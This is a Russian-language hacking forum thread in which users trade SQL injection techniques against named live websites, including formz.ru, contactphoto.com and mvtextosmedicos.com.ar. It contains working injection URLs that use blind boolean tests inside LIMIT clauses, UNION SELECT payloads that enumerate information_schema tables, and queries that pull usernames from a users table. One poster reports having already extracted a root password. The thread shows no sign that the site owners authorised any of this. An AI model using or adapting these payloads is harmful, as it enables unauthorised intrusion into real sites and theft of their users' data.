попробуй войти под администратором. там есть поля ввода. и там уже смотри, либо воспользуйся сканером, типо пельмешко и так далее.
хм.... я вытащил пароль юзера root, но он туда не подходит, туда подходят только пароли обычных пользователей что и навело меня на мысль об использовании другоо входа для администраторов
2jokester меня тоже интересует реализация инъекции после order и limit если таковая возможна. если бы ордера не было то можно былобы union прикрутить, а так не получается. Есть идеи?
Лично мне о такой возможности ничего не известно (если это мускул разумеется), но как видишь уважаемый prescott хоть и косвенно, но дал понять, что это возможно. Ну что-ж линк я дал, надеюсь увидеть реализацию.
2jokester А почему ругается при попытке завершить первый запрос ; ?? может он эти настройки сервера имел ввиду)
в MySQL использовать UNION после ORDER нельзя: SELECT 1 ORDER BY 1 LIMIT 1 UNION SELECT 1 -> Incorrect usage of UNION and ORDER BY но просто с LIMIT можно: SELECT 1 LIMIT 1 UNION SELECT 1; -> +---+ | 1 | +---+ | 1 | +---+ 1 row in set (0.00 sec)
Union использовать действительно нельзя, но: Code: select * from <table_name> order by 1 limit 0,5 Допустим 5 в лимите уязвимый параметр, пишем так: Code: http://site.ru/id=5*if(version='5.0.1т.д. и т.п.',1,2) Получаем Code: select * from <table_name> order by 1 limit 0, 5*if(version='5.0.1т.д. и т.п.',1,2) Если вернуло пять записей - угадал версию, если десять - не угадал. Пишешь сплоит который перебирает посимвольно и дело в шляпе. И подзапросы в mysql тоже никто не отменял кстати.
Я думаю что в случае с formz.ru стоит другой сервер базы данных, поэтому и прошу помощи ачатовцев. С распространенными БД я сам могу в большинстве случаев справиться, тут просто какая то некандиция... Например такой запрос прокатывает, следовательно ; для этой БД означает конец запроса, ошибки ведь не возникает, заметь! Code: http://formz.ru/nb/public/faq/view?table.question_list.limit=2;%20select%201-- А если вместо точки с запятой поставить например дефис, вылетает критическая ошибка.
2prescott почему тут не получается? вроде все как ты описывал, помоги разобраться http://www.contactphoto.com/archive.php?search=&limit=1 вроде тогда один из двух вариантов должен был сработать http://www.contactphoto.com/archive.php?search=&limit=1,2*if(ascii(substr(version(),1,1))=34,1,2)/* или http://www.contactphoto.com/archive.php?search=&limit=1,2*if(ascii(substr(version(),1,1))=35,1,2)/*
@prescott подзапросы после лимита или в его аргументе нельзя использовать, можно только добавить UNION SELECT и то при условии, что перед лимитом нет ORDER BY не будет так работать, даже такой запрос возвращает ошибку: select 1 order by 1 limit 1,5*1;
Потомучто это не mysql и не mssql, ибо запрос http://www.contactphoto.com/archive.php?search=&limit=1,2-- ругается на --, что для них должно однозначно трактоваться как комментарий. UPD: был не прав, ошибка пишет что это действительно mysql...
бред, ты хоть в ошибки смотри это MySQL. Насчет --, уже сотый раз говорю, что в MySQL нужно ставить пробел после него http://www.contactphoto.com/archive.php?search=&limit=1,2--%20
кстати, если тебе всетаки нужен тот сайт, то инъекция есть тут, да и крутится легко: Code: http://www.contactphoto.com/view.php?sec=programs&eventid=1290+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4/*
http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+concat(table_name,0x3a,column_name ),2,3,4,5,6,7,8+from+information_schema.columns/* - пишет, что табла users есть http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+username,2,3,4,5,6,7,8+from+users/* - пишет ошибку... в чем проблема
Потомучто таблица в другой базе. Смотри так: Code: http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+concat(table_name,0x3a,table_schema ),2,3,4,5,6,7,8+from+information_schema.columns/* Она принадлежит базе test, вот запрос: Code: http://mvtextosmedicos.com.ar/index.php?cat_id=-23+union+select+username,2,3,4,5,6,7,8+from+test.users/*
